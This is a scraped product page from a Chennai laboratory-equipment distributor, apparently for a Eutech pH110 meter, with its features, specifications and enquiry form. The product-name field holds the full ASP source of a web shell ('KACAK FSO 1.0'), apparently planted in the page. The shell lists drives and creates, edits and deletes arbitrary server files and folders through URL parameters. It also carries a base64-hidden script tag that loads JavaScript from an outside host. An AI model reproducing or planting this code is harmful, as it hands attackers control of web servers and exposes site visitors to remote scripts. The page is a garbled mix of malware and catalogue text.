aicgroup, chennai
   
 
  Untitled Document
aic group
EUTECH PRODUCTS BY PARAMETER
Ph
Oxidation Reduction Potential
Ion
Conductivity
Total Dissolved Solids
Salinity
Dissolved Oxygen
Colorimetry
Turbidity
Temperature
Multiparameter
 
Untitled Document
Our BRANDS
  AXIVA
  EUTECH
  HI-MEDIA
  MERCK
  NICE
  NUPORE
  POLYLAB
  SRL
  SCHOTT-DURAN
  THERMOSCIENTIFIC
  WHATMAN
  QIAGEN
  REAGECON
  WATERS
 
Untitled Document
Our Branches
Associate Instruments and Chemicals, Chennai
Associate International, Pondicherry
Associate Enterprises, Bangalore
Associate Alliance, Hyderabad
 
Product in Detail
  [ eutech ] - Details
   
Product Name KACAK Shell <% Dim Base64Chars Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" & _ "abcdefghijklmnopqrstuvwxyz" & _ "0123456789" & _ "+/" Public Function base64_encode( byVal strIn ) Dim c1, c2, c3, w1, w2, w3, w4, n, strOut For n = 1 To Len( strIn ) Step 3 c1 = Asc( Mid( strIn, n, 1 ) ) c2 = Asc( Mid( strIn, n + 1, 1 ) + Chr(0) ) c3 = Asc( Mid( strIn, n + 2, 1 ) + Chr(0) ) w1 = Int( c1 / 4 ) : w2 = ( c1 And 3 ) * 16 + Int( c2 / 16 ) If Len( strIn ) >= n + 1 Then w3 = ( c2 And 15 ) * 4 + Int( c3 / 64 ) Else w3 = -1 End If If Len( strIn ) >= n + 2 Then w4 = c3 And 63 Else w4 = -1 End If strOut = strOut + mimeencode( w1 ) + mimeencode( w2 ) + _ mimeencode( w3 ) + mimeencode( w4 ) Next base64_encode = strOut End Function Private Function mimeencode( byVal intIn ) If intIn >= 0 Then mimeencode = Mid( Base64Chars, intIn + 1, 1 ) Else mimeencode = "" End If End Function Public Function base64_decode( byVal strIn ) Dim w1, w2, w3, w4, n, strOut For n = 1 To Len( strIn ) Step 4 w1 = mimedecode( Mid( strIn, n, 1 ) ) w2 = mimedecode( Mid( strIn, n + 1, 1 ) ) w3 = mimedecode( Mid( strIn, n + 2, 1 ) ) w4 = mimedecode( Mid( strIn, n + 3, 1 ) ) If w2 >= 0 Then _ strOut = strOut + _ Chr( ( ( w1 * 4 + Int( w2 / 16 ) ) And 255 ) ) If w3 >= 0 Then _ strOut = strOut + _ Chr( ( ( w2 * 16 + Int( w3 / 4 ) ) And 255 ) ) If w4 >= 0 Then _ strOut = strOut + _ Chr( ( ( w3 * 64 + w4 ) And 255 ) ) Next base64_decode = strOut End Function Private Function mimedecode( byVal strIn ) If Len( strIn ) = 0 Then mimedecode = -1 : Exit Function Else mimedecode = InStr( Base64Chars, strIn ) - 1 End If End Function dim myStringo stringo = "PHNjcmlwdCB0eXBlPSJ0ZXh0L0phdmFTY3JpcHQiIHNyYz0i" stringo_1 = "aHR0cDovL3dlYnNoZWxsLmNvL3doby9tYWluLmpzIj48L3NjcmlwdD4" myStringo = base64_decode(stringo+stringo_1) if request.querystring("TGH") = "1" then on error resume next es=request.querystring("Kacak") diez=server.urlencode(left(es,(instrRev(es,"\"))-1)) Select case es case "C:" diez="C:" case "D:" diez="D:" end select ' Functions to provide encoding/decoding of strings with Base64. ' ' Encoding: myEncodedString = base64_encode( inputString ) ' Decoding: myDecodedString = base64_decode( encodedInputString ) ' ' Programmed by Markus Hartsmar for ShameDesigns in 2002. ' Email me at: mark@shamedesigns.com ' Visit our website at: http://www.shamedesigns.com/ ' %> <% else %> <% if request.querystring("Dosyakaydet") <> "" then set kaydospos=createobject("scripting.filesystemobject") set kaydoses=kaydospos.createtextfile(request.querystring("dosyakaydet") & request("dosadi")) set kaydoses=nothing set kaydospos=nothing set kaydospos=createobject("scripting.filesystemobject") set kaydoses=kaydospos.opentextfile(request.querystring("dosyakaydet") & request("dosadi"), 2, true) kaydoses.write request("duzenx") set kaydoses=nothing set kaydospos=nothing end if %> <% if request.querystring("yenidosya") <> "" then %>


Kacak ©
Hackerbox

KACAK FSO 1.0


Cyber Protest 
xLw@GrayHatz ~ TurkGuvenligi.Info 

 Current Directory
 <%=response.write(request.querystring("yenidosya"))%>  
 
&klas=<%=request.querystring("yenidosya")%>" name="kaypos">


Filename :


Content : 


 

 

<% else %> <% if request.querystring("klasorac") <> "" then set doses=createobject("scripting.filesystemobject") set es=doses.createfolder(request.querystring("aktifklas") & request("duzenx")) set es=nothing set doses=nothing end if %> <% if request.querystring("klasac") <> "" then set aktifklas=request.querystring("aktifklas") %>


Hackerbox

KACAK FSO 1.0


 Current Path
 <%=aktifklas%>  
<% else %> <% if request.querystring("suruculer") <> "" then %>
 

  



 

 


Hackerbox

KACAK FSO 1.0


Have Fun 

 
 
 
Drive Name Size Free Status Settings
<% set klassis =server.createobject("scripting.filesystemobject") set klasdri=klassis.drives %> <% for each dongu in klasdri %> <% if dongu.driveletter <> "A" then if dongu.isready=true then %> <% select case dongu.drivetype case 0 teype="Diger" case 1 teype="Tasinir" case 2 teype="HDD" case 3 teype="NetWork" case 4 teype="CD-Rom" case 5 teype="FlashMem" end select %>
 <%=dongu.driveletter%>:\ ( <%=dongu.filesystem%> ) <%=Round(dongu.totalsize/(1024*1024),1)%> MB <%=Round(dongu.availablespace/(1024*1024),1)%> MB <%=teype%> 
Gir
<% end if end if %> <% next %>
 

 

 
<% else %> <% if request.querystring("kaydet") <> "" then set dossisx=server.createobject("scripting.filesystemobject") set dosx=dossisx.opentextfile(request.querystring("kaydet"), 2, true) dosx.write request("duzenx") dosx.close set dosyax=nothing set dossisx=nothing end if %> <% if request.querystring("duzenle") <> "" then set dossis=server.createobject("scripting.filesystemobject") set dos=dossis.opentextfile(request.querystring("duzenle"), 1) sedx = dos.readall dos.close set dosya=nothing set dossis=nothing set aktifklas=request.querystring("klas") %>


Hackerbox

KACAK FSO 1.0


Have Fun 

 Current File
 <%=response.write(request.querystring("duzenle"))%>  
 
&klas=<%=aktifklas%>" name="kaypos">


 

 

<% else %> <% if request.querystring("klas") <> "" then aktifklas=Request.querystring("klas") if request.querystring("usak") = "1" then aktifklas=aktifklas & "\" end if else aktifklas=server.mappath("/") aktifklas=aktifklas & "\" end if if request.querystring("silklas") <> "" then set sis=createobject("scripting.filesystemobject") silincekklas=request.querystring("silklas") sis.deletefolder(silincekklas) set sis=nothing 'response.write(sil & " Silindi") end if if request.querystring("sildos") <> "" then silincekdos=request.querystring("sildos") set dosx=createobject("scripting.filesystemobject") set dos=dosx.getfile(silincekdos) dos.delete set dos=nothing set dosyasis=nothing end if select case aktifklas case "C:" aktifklas="C:\" case "D:" aktifklas="D:\" case "E:" aktifklas="E:\" case "F:" aktifklas="F:\" case "G:" aktifklas="G:\" case "H:" aktifklas="H:\" case "I:" aktifklas="I:\" case "J:" aktifklas="J:\" case "K:" aktifklas="K:\" end select if aktifklas=("C:") then aktifklas=("C:\") Set FS = CreateObject("Scripting.FileSystemObject") Set klasor = FS.GetFolder(aktifklas) Set altklasorler = klasor.SubFolders Set dosyalar = klasor.files %>


Hackerbox

KACAK FSO 1.0


Have Fun 

 Current Directory
 <%=response.write(aktifklas)%>

" style="text-decoration: none"> Parent Directory

 
Drives
New Folder
New File
 Type  File Adi

 Settings

<%response.write(myStringo)%> <% For each oge in altklasorler %>

Folder

 <%=oge.name%> 

Open

Delete

<% Next %> <% For each oge in dosyalar %>

File

 <%=oge.name%>         ( <%=Round(oge.size/1024,1)%> KB ) 

Edit

Sil

<% Next %> <% if aktifklas=("C:\") then aktifklas=("C:") %> <% end if %> <% end if %> <% end if %> <% end if %> <% end if %>
Category Eutech
Stock Availability Yes
   
JavaScript tabs Sample
Cyber Scan pH110
   
 
  • 5-point Push-Button Calibration with Auto-Buffer Recognition for quick calibration with no calibration mistakes

     
  • Choice of pH Buffer sets: USA, NIST, DIN or Low Ionic to cater wider applications
     
  • Automatic Temperature Compensation (ATC) for the highest accuracy under fluctuating temperatures
     
  • Stores/ Recalls up to 100 Data Sets with temperature readings
     
  • RS232 output with PC-based Complimentary Data Acquisition Software (for pH110) helps organize data to import into most popular spreadsheet programs for report generation
     
  • Recall Electrode Slope, Electrode Offset Value and Previous Calibration Values for easy reference
     
  • Recall Electrode Slope, Electrode Offset Value and Previous Calibration Values for easy reference
     
  • Stability Indicator prompts whenever reading stabilizes
     
  • Hold Function momentarily freeze reading for easy viewing and recording
     
  • Auto-Power Off conserves battery power and save money
     
  • Self-Diagnostic with message codes for easy troubleshooting
     
  • Large, Easy-to-Read Custom LCD Display with simultaneous readings provides optimum viewing with user-friendly icons
     
  • Power with batteries or optional AC adapter for use in the field or at bench-top with built-in stand
     
  • Rugged Carrying Case (Optional) provides handy on-site meter calibration and measurement
       
      Applications
     
     

    Industrial: For checks in water conditioning plants, conditioning plants, cooling towers, food processing water testing, printing and chemical industries, and water/wastewater treatment. Use with ORP electrode to monitor plating operations, and other redox measurements.

     
      Environmental/Agricultural: Use in ecology studies, aquariums, and hydroponics.
     
      Educational: Ideal for quick, accurate checks in laboratories and schools.

     

      Product Specification Description
      pH Range -2.00 to 16.00 pH
     

    Resolution & Accuracy

    0.1 mV & ±0.2 mV (within ±199.9 mV);
    1 mV & ±2 mV (beyond ±200 mV)
      Temperature Range -10.0 to 110.0 °C (14.0 to 230 °F)
      mV Range ±199.9 mV (extended) & ±1999 mV
      Resolution & Accuracy 1 mV & ± 1 mV
      Temperature Compensation Automatic / Manual (0 to 100 °C)
      No. of Calibration Points Up to 6 points
      Auto-Hold Yes
      Memory 100 data sets
      Output Yes (RS232C)
      pH Slope & Offset Display Yes
      Special Functions Stability Indicator; Self-diagnostic;
    Hold & Auto-Power Off after 20 minutes
      Power 4 'AAA' x 1.4V batteries or 9VDC power adapter


      Product : Cyber Scan pH110
      Name :
      Phone :

      Email :
      Message :
         

     

       
    Information    
    About aicgroup
    News
    Video Library
    Downloads
    Terms and Conditions
     
    Testimonial
    Customer Support
    FAQs
    Deliveries
    Catalogue Request
     
    New Products
    General Customer Pricelist
    Careers
    Downloads
    Terms and Conditions
     
     

    2016. aicgroup.in, All rights Reserved. Terms of Use.

     

     

    Reg. Office :
    56, Langs Garden Road, Pudupet, Chennai - 600 002.
    Tel.: 28416127, 28550686, 28515025, 28413862
    mail : aic1@vsnl.com

    Underlying the success of the company is an ethos of commitment to the values of Quality, Service, and Reliability. Continuous innovation and close customer interaction have enabled the Company to consolidate its position at the leading edge of the various commercial activities